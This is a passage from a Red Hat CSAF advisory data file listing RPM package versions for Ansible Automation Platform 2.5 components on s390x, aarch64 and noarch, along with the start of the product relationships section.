"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.5.10-7.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.5.10-7.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el8ap.s390x",
"product": {
"name": "receptor-0:1.6.7-1.el8ap.s390x",
"product_id": "receptor-0:1.6.7-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"product_id": "receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"product_id": "receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.6.31-1.el8ap.s390x",
"product": {
"name": "automation-controller-0:4.6.31-1.el8ap.s390x",
"product_id": "automation-controller-0:4.6.31-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.6.31-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.6.31-1.el8ap?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"product_id": "python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"product": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"product_id": "automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.17-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"product_id": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.17-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.17-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.17-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el9ap.aarch64",
"product": {
"name": "receptor-0:1.6.7-1.el9ap.aarch64",
"product_id": "receptor-0:1.6.7-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"product_id": "receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"product_id": "receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.6.31-1.el9ap.aarch64",
"product": {
"name": "automation-controller-0:4.6.31-1.el9ap.aarch64",
"product_id": "automation-controller-0:4.6.31-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.6.31-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.6.31-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"product_id": "python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"product": {
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"product_id": "automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.5.10-7.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"product": {
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"product_id": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.5.10-7.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"product_id": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.5.10-7.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.5.10-7.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el8ap.aarch64",
"product": {
"name": "receptor-0:1.6.7-1.el8ap.aarch64",
"product_id": "receptor-0:1.6.7-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"product_id": "receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"product_id": "receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.6.31-1.el8ap.aarch64",
"product": {
"name": "automation-controller-0:4.6.31-1.el8ap.aarch64",
"product_id": "automation-controller-0:4.6.31-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.6.31-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.6.31-1.el8ap?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"product": {
"name": "python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"product_id": "python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-daphne@4.2.2-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"product": {
"name": "python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"product_id": "python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulpcore@3.49.66-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-hub-0:4.10.17-1.el9ap.noarch",
"product": {
"name": "automation-hub-0:4.10.17-1.el9ap.noarch",
"product_id": "automation-hub-0:4.10.17-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-hub@4.10.17-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"product": {
"name": "python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"product_id": "python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pyasn1@0.6.4-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"product_id": "automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller@1.1.21-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"product_id": "automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-base@1.1.21-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"product_id": "automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-base-services@1.1.21-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"product_id": "automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-event-stream-services@1.1.21-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"product": {
"name": "automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"product_id": "automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-worker-services@1.1.21-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"product": {
"name": "python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"product_id": "python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-galaxy-ng@4.10.17-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"product": {
"name": "automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"product_id": "automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway@2.5.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"product": {
"name": "automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"product_id": "automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-config@2.5.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"product": {
"name": "automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"product_id": "automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-server@2.5.20260804-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "receptorctl-0:1.6.7-1.el9ap.noarch",
"product": {
"name": "receptorctl-0:1.6.7-1.el9ap.noarch",
"product_id": "receptorctl-0:1.6.7-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptorctl@1.6.7-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"product_id": "automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.6.31-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.6.31-1.el9ap.noarch",
"product": {
"name": "automation-controller-server-0:4.6.31-1.el9ap.noarch",
"product_id": "automation-controller-server-0:4.6.31-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.6.31-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"product_id": "automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.6.31-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"product": {
"name": "python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"product_id": "python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-daphne@4.2.2-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"product": {
"name": "python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"product_id": "python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pulpcore@3.49.66-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"product": {
"name": "automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"product_id": "automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller@1.1.21-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"product": {
"name": "automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"product_id": "automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-base@1.1.21-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"product": {
"name": "automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"product_id": "automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-base-services@1.1.21-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"product": {
"name": "automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"product_id": "automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-event-stream-services@1.1.21-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"product": {
"name": "automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"product_id": "automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-eda-controller-worker-services@1.1.21-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-hub-0:4.10.17-1.el8ap.noarch",
"product": {
"name": "automation-hub-0:4.10.17-1.el8ap.noarch",
"product_id": "automation-hub-0:4.10.17-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-hub@4.10.17-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"product": {
"name": "python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"product_id": "python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pyasn1@0.6.4-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"product": {
"name": "python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"product_id": "python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-galaxy-ng@4.10.17-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"product": {
"name": "automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"product_id": "automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway@2.5.20260804-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"product": {
"name": "automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"product_id": "automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-config@2.5.20260804-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"product": {
"name": "automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"product_id": "automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-server@2.5.20260804-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "receptorctl-0:1.6.7-1.el8ap.noarch",
"product": {
"name": "receptorctl-0:1.6.7-1.el8ap.noarch",
"product_id": "receptorctl-0:1.6.7-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptorctl@1.6.7-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"product_id": "automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.6.31-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.6.31-1.el8ap.noarch",
"product": {
"name": "automation-controller-server-0:4.6.31-1.el8ap.noarch",
"product_id": "automation-controller-server-0:4.6.31-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.6.31-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"product_id": "automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.6.31-1.el8ap?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.6.31-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5-Developer-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.6.31-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5-Developer-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src"
},
"product_reference": "receptor-0:1.6.7-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5-Developer-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.7-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch"
},
"product_reference": "receptorctl-0:1.6.7-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5-Developer-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src"
},
"product_reference": "receptor-0:1.6.7-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5-Inside-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.7-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch"
},
"product_reference": "receptorctl-0:1.6.7-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5-Inside-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
